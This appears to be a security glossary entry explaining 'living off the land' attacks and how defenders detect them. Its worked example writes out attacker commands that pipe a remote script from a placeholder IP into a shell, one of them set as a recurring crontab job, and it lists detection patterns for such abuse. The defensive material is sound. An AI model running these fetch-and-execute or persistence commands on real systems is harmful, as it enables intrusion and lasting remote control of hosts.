Malware

Living off the land

Also called LotL.

Living off the land is using tools already on the machine, like `wget`, PowerShell, `curl`, or cron, to carry out an attack instead of dropping a custom program. The traffic and commands look like normal admin work.

How it is measured

Hunt for suspicious use of normal tools: `curl` piped to `sh`, `certutil` downloading files, PowerShell with encoded commands, or `crontab` entries that fetch scripts. Command-line logging and process trees show the pattern. The tool is clean; the arguments and parent process are the evidence.

Baseline normal use first. If `wget` never runs on a web server, a call to it from the PHP-FPM user is meaningful.

Worked example

A shared-hosting account is compromised through a file-upload bug. The attacker drops no binary. They run `wget -qO- http://203.0.113.5/a | sh` from a PHP webshell, add `* * * * * curl -s http://203.0.113.5/b | sh` to the user's crontab, and use `find` to hunt for config files.

The antivirus finds nothing, as no malicious file exists. The cron entry and the process tree of `php-fpm` spawning `sh` give it away.

How it differs

Living off the land relies on trusted tools; a webshell is often the way those tools get called from a web request. Remote code execution is the flaw that makes the first command possible. Unlike a dropper, living-off-the-land leaves no file to hash, so signature scanning has little to match.

Common errors

Searching only for new binaries. Blocking `wget` globally and breaking deployments. Ignoring cron and systemd timers. Not logging command lines. Assuming a clean file scan means a clean host.

In practice

Turn on process and command-line logging on your servers. Remove tools nothing needs, such as `wget` on a web-only host. Review crontabs and timers for every account and alert on any outbound download started by the web server user.

See also

Webshell, Remote code execution

Sources

Count this on a real site.

Watch my website